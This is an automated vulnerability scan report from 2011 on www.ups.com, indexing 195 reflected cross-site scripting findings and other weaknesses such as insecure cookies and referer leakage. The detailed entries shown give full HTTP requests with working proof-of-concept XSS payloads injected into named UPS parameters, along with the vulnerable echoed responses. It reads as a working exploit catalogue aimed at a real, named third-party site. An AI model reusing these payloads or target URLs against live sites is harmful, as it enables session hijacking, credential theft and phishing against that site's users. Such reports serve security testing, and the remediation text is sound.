XSS, Cross Site Scripting, CWE-79, www.ups.com

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by CloudScan Vulnerability Crawler at Sun Feb 13 19:32:58 CST 2011.


The DORK Report

1. Cross-site scripting (reflected)

1.1. http://www.ups.com/bussol [WT.svl parameter]

1.2. http://www.ups.com/bussol [actionID parameter]

1.3. http://www.ups.com/bussol [actionID parameter]

1.4. http://www.ups.com/bussol [contentID parameter]

1.5. http://www.ups.com/bussol [contentID parameter]

1.6. http://www.ups.com/bussol [loc parameter]

1.7. http://www.ups.com/bussol [loc parameter]

1.8. http://www.ups.com/bussol [name of an arbitrarily supplied request parameter]

1.9. http://www.ups.com/bussol [name of an arbitrarily supplied request parameter]

1.10. http://www.ups.com/bussol [viewID parameter]

1.11. http://www.ups.com/bussol [viewID parameter]

1.12. http://www.ups.com/bussol/ [WT.svl parameter]

1.13. http://www.ups.com/bussol/ [loc parameter]

1.14. http://www.ups.com/bussol/ [loc parameter]

1.15. http://www.ups.com/bussol/ [name of an arbitrarily supplied request parameter]

1.16. http://www.ups.com/bussol/ [name of an arbitrarily supplied request parameter]

1.17. http://www.ups.com/bussol/ [viewID parameter]

1.18. http://www.ups.com/bussol/ [viewID parameter]

1.19. http://www.ups.com/content/global/index.jsx [REST URL parameter 2]

1.20. http://www.ups.com/content/us/en/about/index.html [REST URL parameter 2]

1.21. http://www.ups.com/content/us/en/about/index.html [REST URL parameter 3]

1.22. http://www.ups.com/content/us/en/about/news/service_updates/20091007_batteries.html [REST URL parameter 2]

1.23. http://www.ups.com/content/us/en/about/news/service_updates/20091007_batteries.html [REST URL parameter 3]

1.24. http://www.ups.com/content/us/en/about/news/service_updates/20100120_on_call.html [REST URL parameter 2]

1.25. http://www.ups.com/content/us/en/about/news/service_updates/20100120_on_call.html [REST URL parameter 3]

1.26. http://www.ups.com/content/us/en/about/news/service_updates/20100624_fraud.html [REST URL parameter 2]

1.27. http://www.ups.com/content/us/en/about/news/service_updates/20100624_fraud.html [REST URL parameter 3]

1.28. http://www.ups.com/content/us/en/about/news/service_updates/20101102_investigation.html [REST URL parameter 2]

1.29. http://www.ups.com/content/us/en/about/news/service_updates/20101102_investigation.html [REST URL parameter 3]

1.30. http://www.ups.com/content/us/en/about/news/service_updates/20101102_toner.html [REST URL parameter 2]

1.31. http://www.ups.com/content/us/en/about/news/service_updates/20101102_toner.html [REST URL parameter 3]

1.32. http://www.ups.com/content/us/en/about/news/service_updates/20101217_imp_cntrl.html [REST URL parameter 2]

1.33. http://www.ups.com/content/us/en/about/news/service_updates/20101217_imp_cntrl.html [REST URL parameter 3]

1.34. http://www.ups.com/content/us/en/about/news/service_updates/retail_requirement.html [REST URL parameter 2]

1.35. http://www.ups.com/content/us/en/about/news/service_updates/retail_requirement.html [REST URL parameter 3]

1.36. http://www.ups.com/content/us/en/about/sites.html [REST URL parameter 2]

1.37. http://www.ups.com/content/us/en/about/sites.html [REST URL parameter 3]

1.38. http://www.ups.com/content/us/en/contact/index.html [REST URL parameter 2]

1.39. http://www.ups.com/content/us/en/contact/index.html [REST URL parameter 3]

1.40. http://www.ups.com/content/us/en/freight/air_freight.html [REST URL parameter 2]

1.41. http://www.ups.com/content/us/en/freight/air_freight.html [REST URL parameter 3]

1.42. http://www.ups.com/content/us/en/freight/customsbrokerage.html [REST URL parameter 2]

1.43. http://www.ups.com/content/us/en/freight/customsbrokerage.html [REST URL parameter 3]

1.44. http://www.ups.com/content/us/en/freight/expedite.html [REST URL parameter 2]

1.45. http://www.ups.com/content/us/en/freight/expedite.html [REST URL parameter 3]

1.46. http://www.ups.com/content/us/en/freight/index.html [REST URL parameter 2]

1.47. http://www.ups.com/content/us/en/freight/index.html [REST URL parameter 3]

1.48. http://www.ups.com/content/us/en/freight/ocean_freight.html [REST URL parameter 2]

1.49. http://www.ups.com/content/us/en/freight/ocean_freight.html [REST URL parameter 3]

1.50. http://www.ups.com/content/us/en/freight/road_freight.html [REST URL parameter 2]

1.51. http://www.ups.com/content/us/en/freight/road_freight.html [REST URL parameter 3]

1.52. http://www.ups.com/content/us/en/index.jsx [REST URL parameter 2]

1.53. http://www.ups.com/content/us/en/index.jsx [REST URL parameter 3]

1.54. http://www.ups.com/content/us/en/locations/alliances/index.html [REST URL parameter 2]

1.55. http://www.ups.com/content/us/en/locations/alliances/index.html [REST URL parameter 3]

1.56. http://www.ups.com/content/us/en/locations/aso/index.html [REST URL parameter 2]

1.57. http://www.ups.com/content/us/en/locations/aso/index.html [REST URL parameter 3]

1.58. http://www.ups.com/content/us/en/locations/custcenters/index.html [REST URL parameter 2]

1.59. http://www.ups.com/content/us/en/locations/custcenters/index.html [REST URL parameter 3]

1.60. http://www.ups.com/content/us/en/locations/dropboxes/index.html [REST URL parameter 2]

1.61. http://www.ups.com/content/us/en/locations/dropboxes/index.html [REST URL parameter 3]

1.62. http://www.ups.com/content/us/en/locations/store/index.html [REST URL parameter 2]

1.63. http://www.ups.com/content/us/en/locations/store/index.html [REST URL parameter 3]

1.64. http://www.ups.com/content/us/en/myups/billing/index.html [REST URL parameter 2]

1.65. http://www.ups.com/content/us/en/myups/billing/index.html [REST URL parameter 3]

1.66. http://www.ups.com/content/us/en/myups/mgmt/index.html [REST URL parameter 2]

1.67. http://www.ups.com/content/us/en/myups/mgmt/index.html [REST URL parameter 3]

1.68. http://www.ups.com/content/us/en/register/help/index.html [REST URL parameter 2]

1.69. http://www.ups.com/content/us/en/register/help/index.html [REST URL parameter 3]

1.70. http://www.ups.com/content/us/en/register/reasons/index.html [REST URL parameter 2]

1.71. http://www.ups.com/content/us/en/register/reasons/index.html [REST URL parameter 3]

1.72. http://www.ups.com/content/us/en/resources/index.html [REST URL parameter 2]

1.73. http://www.ups.com/content/us/en/resources/index.html [REST URL parameter 3]

1.74. http://www.ups.com/content/us/en/resources/pay/index.html [REST URL parameter 2]

1.75. http://www.ups.com/content/us/en/resources/pay/index.html [REST URL parameter 3]

1.76. http://www.ups.com/content/us/en/resources/service/delivery_change.html [REST URL parameter 2]

1.77. http://www.ups.com/content/us/en/resources/service/delivery_change.html [REST URL parameter 3]

1.78. http://www.ups.com/content/us/en/resources/service/index.html [REST URL parameter 2]

1.79. http://www.ups.com/content/us/en/resources/service/index.html [REST URL parameter 3]

1.80. http://www.ups.com/content/us/en/resources/ship/fraud.html [REST URL parameter 2]

1.81. http://www.ups.com/content/us/en/resources/ship/fraud.html [REST URL parameter 3]

1.82. http://www.ups.com/content/us/en/resources/ship/index.html [REST URL parameter 2]

1.83. http://www.ups.com/content/us/en/resources/ship/index.html [REST URL parameter 3]

1.84. http://www.ups.com/content/us/en/resources/ship/terms/privacy.html [REST URL parameter 2]

1.85. http://www.ups.com/content/us/en/resources/ship/terms/privacy.html [REST URL parameter 3]

1.86. http://www.ups.com/content/us/en/resources/ship/terms/shipping/index.html [REST URL parameter 2]

1.87. http://www.ups.com/content/us/en/resources/ship/terms/shipping/index.html [REST URL parameter 3]

1.88. http://www.ups.com/content/us/en/resources/ship/terms/use.html [REST URL parameter 2]

1.89. http://www.ups.com/content/us/en/resources/ship/terms/use.html [REST URL parameter 3]

1.90. http://www.ups.com/content/us/en/resources/start/index.html [REST URL parameter 2]

1.91. http://www.ups.com/content/us/en/resources/start/index.html [REST URL parameter 3]

1.92. http://www.ups.com/content/us/en/resources/techsupport/index.html [REST URL parameter 2]

1.93. http://www.ups.com/content/us/en/resources/techsupport/index.html [REST URL parameter 3]

1.94. http://www.ups.com/content/us/en/resources/track/index.html [REST URL parameter 2]

1.95. http://www.ups.com/content/us/en/resources/track/index.html [REST URL parameter 3]

1.96. http://www.ups.com/content/us/en/shipping/index.html [REST URL parameter 2]

1.97. http://www.ups.com/content/us/en/shipping/index.html [REST URL parameter 3]

1.98. http://www.ups.com/content/us/en/shipping/time/service/index.html [REST URL parameter 2]

1.99. http://www.ups.com/content/us/en/shipping/time/service/index.html [REST URL parameter 3]

1.100. http://www.ups.com/content/us/en/shipping/time/service/shipping/index.html [REST URL parameter 2]

1.101. http://www.ups.com/content/us/en/shipping/time/service/shipping/index.html [REST URL parameter 3]

1.102. http://www.ups.com/content/us/en/siteguide/index.html [REST URL parameter 2]

1.103. http://www.ups.com/content/us/en/siteguide/index.html [REST URL parameter 3]

1.104. http://www.ups.com/content/us/en/tracking/fgv/index.html [REST URL parameter 2]

1.105. http://www.ups.com/content/us/en/tracking/fgv/index.html [REST URL parameter 3]

1.106. http://www.ups.com/content/us/en/tracking/quantumview/index.html [REST URL parameter 2]

1.107. http://www.ups.com/content/us/en/tracking/quantumview/index.html [REST URL parameter 3]

1.108. http://www.ups.com/content/us/en/tracking/tools/index.html [REST URL parameter 2]

1.109. http://www.ups.com/content/us/en/tracking/tools/index.html [REST URL parameter 3]

1.110. http://www.ups.com/dropoff [WT.svl parameter]

1.111. http://www.ups.com/dropoff [loc parameter]

1.112. http://www.ups.com/dropoff [name of an arbitrarily supplied request parameter]

1.113. https://www.ups.com/account/am/start [REST URL parameter 2]

1.114. https://www.ups.com/account/am/start [REST URL parameter 2]

1.115. https://www.ups.com/account/am/start [REST URL parameter 2]

1.116. https://www.ups.com/account/am/start [REST URL parameter 3]

1.117. https://www.ups.com/account/am/start [REST URL parameter 3]

1.118. https://www.ups.com/account/am/start [REST URL parameter 3]

1.119. https://www.ups.com/account/am/start [loc parameter]

1.120. https://www.ups.com/account/am/start [loc parameter]

1.121. https://www.ups.com/account/am/start [loc parameter]

1.122. https://www.ups.com/account/us/start [REST URL parameter 2]

1.123. https://www.ups.com/account/us/start [REST URL parameter 2]

1.124. https://www.ups.com/account/us/start [REST URL parameter 2]

1.125. https://www.ups.com/account/us/start [REST URL parameter 3]

1.126. https://www.ups.com/account/us/start [REST URL parameter 3]

1.127. https://www.ups.com/account/us/start [REST URL parameter 3]

1.128. https://www.ups.com/account/us/start [loc parameter]

1.129. https://www.ups.com/account/us/start [loc parameter]

1.130. https://www.ups.com/account/us/start [loc parameter]

1.131. https://www.ups.com/cva [REST URL parameter 1]

1.132. https://www.ups.com/cva [REST URL parameter 1]

1.133. https://www.ups.com/cva [REST URL parameter 1]

1.134. https://www.ups.com/cva [loc parameter]

1.135. https://www.ups.com/cva [loc parameter]

1.136. https://www.ups.com/cva [loc parameter]

1.137. https://www.ups.com/myWorkspace/home [REST URL parameter 2]

1.138. https://www.ups.com/myWorkspace/home [REST URL parameter 2]

1.139. https://www.ups.com/myWorkspace/home [REST URL parameter 2]

1.140. https://www.ups.com/myWorkspace/home [loc parameter]

1.141. https://www.ups.com/myWorkspace/home [loc parameter]

1.142. https://www.ups.com/myWorkspace/home [loc parameter]

1.143. https://www.ups.com/myWorkspace/wspref [REST URL parameter 2]

1.144. https://www.ups.com/myWorkspace/wspref [REST URL parameter 2]

1.145. https://www.ups.com/myWorkspace/wspref [REST URL parameter 2]

1.146. https://www.ups.com/myWorkspace/wspref [loc parameter]

1.147. https://www.ups.com/myWorkspace/wspref [loc parameter]

1.148. https://www.ups.com/myWorkspace/wspref [loc parameter]

1.149. https://www.ups.com/myups/addresses [REST URL parameter 2]

1.150. https://www.ups.com/myups/addresses [REST URL parameter 2]

1.151. https://www.ups.com/myups/addresses [REST URL parameter 2]

1.152. https://www.ups.com/myups/addresses [loc parameter]

1.153. https://www.ups.com/myups/addresses [loc parameter]

1.154. https://www.ups.com/myups/addresses [loc parameter]

1.155. https://www.ups.com/myups/forgotpassword [loc parameter]

1.156. https://www.ups.com/one-to-one/forgot [loc parameter]

1.157. https://www.ups.com/one-to-one/register [loc parameter]

1.158. https://www.ups.com/osa/orderSupplies [REST URL parameter 1]

1.159. https://www.ups.com/osa/orderSupplies [REST URL parameter 1]

1.160. https://www.ups.com/osa/orderSupplies [REST URL parameter 1]

1.161. https://www.ups.com/osa/orderSupplies [REST URL parameter 2]

1.162. https://www.ups.com/osa/orderSupplies [REST URL parameter 2]

1.163. https://www.ups.com/osa/orderSupplies [REST URL parameter 2]

1.164. https://www.ups.com/osa/orderSupplies [loc parameter]

1.165. https://www.ups.com/osa/orderSupplies [loc parameter]

1.166. https://www.ups.com/osa/orderSupplies [loc parameter]

1.167. https://www.ups.com/quantum_services/download [loc parameter]

1.168. https://www.ups.com/quantum_services/download [loc parameter]

1.169. https://www.ups.com/quantum_services/download [loc parameter]

1.170. https://www.ups.com/qvadmin/admin [REST URL parameter 1]

1.171. https://www.ups.com/qvadmin/admin [REST URL parameter 1]

1.172. https://www.ups.com/qvadmin/admin [REST URL parameter 1]

1.173. https://www.ups.com/qvadmin/admin [REST URL parameter 2]

1.174. https://www.ups.com/qvadmin/admin [REST URL parameter 2]

1.175. https://www.ups.com/qvadmin/admin [REST URL parameter 2]

1.176. https://www.ups.com/qvadmin/admin [loc parameter]

1.177. https://www.ups.com/qvadmin/admin [loc parameter]

1.178. https://www.ups.com/qvadmin/admin [loc parameter]

1.179. https://www.ups.com/sharp/prefapp [REST URL parameter 2]

1.180. https://www.ups.com/sharp/prefapp [REST URL parameter 2]

1.181. https://www.ups.com/sharp/prefapp [REST URL parameter 2]

1.182. https://www.ups.com/sharp/prefapp [loc parameter]

1.183. https://www.ups.com/sharp/prefapp [loc parameter]

1.184. https://www.ups.com/sharp/prefapp [loc parameter]

1.185. https://www.ups.com/uis/create [REST URL parameter 1]

1.186. https://www.ups.com/uis/create [REST URL parameter 1]

1.187. https://www.ups.com/uis/create [REST URL parameter 1]

1.188. https://www.ups.com/uis/create [REST URL parameter 2]

1.189. https://www.ups.com/uis/create [REST URL parameter 2]

1.190. https://www.ups.com/uis/create [REST URL parameter 2]

1.191. https://www.ups.com/uis/create [loc parameter]

1.192. https://www.ups.com/uis/create [loc parameter]

1.193. https://www.ups.com/uis/create [loc parameter]

1.194. http://www.ups.com/homepage/ddhandler/handler.jsp [Referer HTTP header]

1.195. https://www.ups.com/homepage/ddhandler/handler.jsp [Referer HTTP header]

2. SSL cookie without secure flag set

3. Flash cross-domain policy

3.1. http://www.ups.com/crossdomain.xml

3.2. https://www.ups.com/crossdomain.xml

4. Cookie without HttpOnly flag set

4.1. http://www.ups.com/pressroom/us/press_releases/press_release/Press+Releases/Current+Press+Releases/ci.UPS+Express+Freight+Service+Expands+into+Israel+and+Slovakia.syndication

4.2. http://www.ups.com/pressroom/us/press_releases/press_release/Press+Releases/Homepage+Press+Releases/ci.UPS+Capital+Expands+Latin+American+Network+with+New+Offices+in+Colombia+and+Peru.syndication

4.3. https://www.ups.com/upsemail/input

4.4. http://www.ups.com/

4.5. http://www.ups.com/bussol

4.6. http://www.ups.com/bussol/

4.7. http://www.ups.com/search/quick

5. Cookie scoped to parent domain

6. Cross-domain Referer leakage

6.1. http://www.ups.com/

6.2. http://www.ups.com/WebTracking/track

6.3. http://www.ups.com/bussol

6.4. http://www.ups.com/bussol/

6.5. http://www.ups.com/content/global/index.jsx

6.6. http://www.ups.com/content/us/en/about/index.html

6.7. http://www.ups.com/content/us/en/about/sites.html

6.8. http://www.ups.com/content/us/en/contact/index.html

6.9. http://www.ups.com/content/us/en/freight/air_freight.html

6.10. http://www.ups.com/content/us/en/freight/customsbrokerage.html

6.11. http://www.ups.com/content/us/en/freight/expedite.html

6.12. http://www.ups.com/content/us/en/freight/index.html

6.13. http://www.ups.com/content/us/en/freight/ocean_freight.html

6.14. http://www.ups.com/content/us/en/freight/road_freight.html

6.15. http://www.ups.com/content/us/en/index.jsx

6.16. http://www.ups.com/content/us/en/locations/alliances/index.html

6.17. http://www.ups.com/content/us/en/locations/aso/index.html

6.18. http://www.ups.com/content/us/en/locations/custcenters/index.html

6.19. http://www.ups.com/content/us/en/locations/dropboxes/index.html

6.20. http://www.ups.com/content/us/en/locations/store/index.html

6.21. http://www.ups.com/content/us/en/myups/billing/index.html

6.22. http://www.ups.com/content/us/en/myups/mgmt/index.html

6.23. http://www.ups.com/content/us/en/register/help/index.html

6.24. http://www.ups.com/content/us/en/register/reasons/index.html

6.25. http://www.ups.com/content/us/en/resources/index.html

6.26. http://www.ups.com/content/us/en/resources/pay/index.html

6.27. http://www.ups.com/content/us/en/resources/service/delivery_change.html

6.28. http://www.ups.com/content/us/en/resources/service/index.html

6.29. http://www.ups.com/content/us/en/resources/ship/fraud.html

6.30. http://www.ups.com/content/us/en/resources/ship/index.html

6.31. http://www.ups.com/content/us/en/resources/ship/terms/privacy.html

6.32. http://www.ups.com/content/us/en/resources/ship/terms/shipping/index.html

6.33. http://www.ups.com/content/us/en/resources/ship/terms/use.html

6.34. http://www.ups.com/content/us/en/resources/start/index.html

6.35. http://www.ups.com/content/us/en/resources/techsupport/index.html

6.36. http://www.ups.com/content/us/en/resources/track/index.html

6.37. http://www.ups.com/content/us/en/shipping/index.html

6.38. http://www.ups.com/content/us/en/shipping/time/service/index.html

6.39. http://www.ups.com/content/us/en/siteguide/index.html

6.40. http://www.ups.com/content/us/en/tracking/fgv/index.html

6.41. http://www.ups.com/content/us/en/tracking/quantumview/index.html

6.42. http://www.ups.com/content/us/en/tracking/tools/index.html

6.43. http://www.ups.com/dropoff

6.44. http://www.ups.com/sf

6.45. http://www.ups.com/upsmobile/

7. Email addresses disclosed

7.1. http://www.ups.com/WebTracking/track

7.2. http://www.ups.com/content/us/en/about/news/service_updates/20100624_fraud.html

7.3. http://www.ups.com/content/us/en/contact/index.html

7.4. http://www.ups.com/content/us/en/resources/ship/fraud.html

7.5. http://www.ups.com/content/us/en/resources/ship/terms/privacy.html

8. Private IP addresses disclosed

8.1. http://www.ups.com/

8.2. http://www.ups.com/content/us/en/index.jsx

9. Robots.txt file

9.1. http://www.ups.com/

9.2. https://www.ups.com/myups/registration

10. Cacheable HTTPS response

10.1. https://www.ups.com/favicon.ico

10.2. https://www.ups.com/homepage/ddhandler/handler.jsp

11. HTML uses unrecognised charset

12. SSL certificate



1. Cross-site scripting (reflected)
There are 195 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.ups.com/bussol [WT.svl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol

Issue detail

The value of the WT.svl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b8d1"style%3d"x%3aexpression(alert(1))"f4e955ab522 was submitted in the WT.svl parameter. This input was echoed as 5b8d1"style="x:expression(alert(1))"f4e955ab522 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bussol?loc=en_US&WT.svl=PriNav5b8d1"style%3d"x%3aexpression(alert(1))"f4e955ab522 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:38 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=GJq1NYGSyJt6JdGvfWmChTLqL4mM8L6MNmYnGczyNNgN81gH90Bh!-874049020!-1727860139!15202!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17883


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="hidden" id="unKnown"
   value="&WT.svl=PriNav5b8d1"style="x:expression(alert(1))"f4e955ab522&loc=en_US" />
...[SNIP]...

1.2. http://www.ups.com/bussol [actionID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol

Issue detail

The value of the actionID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82a1a"style%3d"x%3aexpression(alert(1))"0a64840504b was submitted in the actionID parameter. This input was echoed as 82a1a"style="x:expression(alert(1))"0a64840504b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bussol?loc=en_US&viewID=productView&contentID=ct1_sol_sol_int_ship&actionID=videoDemo82a1a"style%3d"x%3aexpression(alert(1))"0a64840504b HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:49 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=vG56NYGdQ5B2RJl7qh78jHpwwn9S1MV1h7C7HmynpjtF7QnySHrQ!813271666!-1727860140!15201!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18141


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="hidden" id="bspa_actionID"
   value="videoDemo82a1a"style="x:expression(alert(1))"0a64840504b" />
...[SNIP]...

1.3. http://www.ups.com/bussol [actionID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol

Issue detail

The value of the actionID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5c518"%3balert(1)//e6dfe32ce27 was submitted in the actionID parameter. This input was echoed as 5c518";alert(1)//e6dfe32ce27 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bussol?loc=en_US&viewID=productView&contentID=ct1_sol_sol_int_ship&actionID=videoDemo5c518"%3balert(1)//e6dfe32ce27 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:50 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=pfl9NYGpRJ3bMG8jFM0yWChjmFpqfrrMrWGLp4snQtvC3TqTs6nF!-874049020!-1727860139!15202!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18084


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
           "name", "bussol",
           "allowScriptAccess","sameDomain",
           "type", "application/x-shockwave-flash",
           "pluginspage", "http://www.adobe.com/go/getflashplayer",
           "FlashVars", "actionID=videoDemo5c518";alert(1)//e6dfe32ce27&bspa_xmlRoot=/xml/ria/na/us/en/bussol/&contentID=ct1_sol_sol_int_ship&hash=1297646750072&loc=en_US&v=2.0.4&viewID=productView"
   );
} else { // flash is too old or we can't detect the plugin
   docum
...[SNIP]...

1.4. http://www.ups.com/bussol [contentID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol

Issue detail

The value of the contentID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b611e"style%3d"x%3aexpression(alert(1))"ed7c494a92e was submitted in the contentID parameter. This input was echoed as b611e"style="x:expression(alert(1))"ed7c494a92e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bussol?loc=en_US&viewID=productView&contentID=ct1_sol_sol_int_shipb611e"style%3d"x%3aexpression(alert(1))"ed7c494a92e&actionID=videoDemo HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:46 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=gLGfNYGh1ll4WyP7f1Tpp4QnQqhjxhJcszfLYXrwGrTqNnnQTvK3!-874049020!-1727860139!15202!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18141


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="hidden" id="bspa_contentID"
   value="ct1_sol_sol_int_shipb611e"style="x:expression(alert(1))"ed7c494a92e" />
...[SNIP]...

1.5. http://www.ups.com/bussol [contentID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol

Issue detail

The value of the contentID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 400cb"%3balert(1)//b2edff9e689 was submitted in the contentID parameter. This input was echoed as 400cb";alert(1)//b2edff9e689 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bussol?loc=en_US&viewID=productView&contentID=ct1_sol_sol_int_ship400cb"%3balert(1)//b2edff9e689&actionID=videoDemo HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:47 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=83XvNYGb1b1Q810cT9c3B7yvfQTw2h92pNzmJzZT72QYZ4Zf74fs!-874049020!-1727860139!15202!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18084


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
"application/x-shockwave-flash",
           "pluginspage", "http://www.adobe.com/go/getflashplayer",
           "FlashVars", "actionID=videoDemo&bspa_xmlRoot=/xml/ria/na/us/en/bussol/&contentID=ct1_sol_sol_int_ship400cb";alert(1)//b2edff9e689&hash=1297646747167&loc=en_US&v=2.0.4&viewID=productView"
   );
} else { // flash is too old or we can't detect the plugin
   document.getElementById("noflashdiv").style.display = "block";
}
</script
...[SNIP]...

1.6. http://www.ups.com/bussol [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /bussol

Issue detail

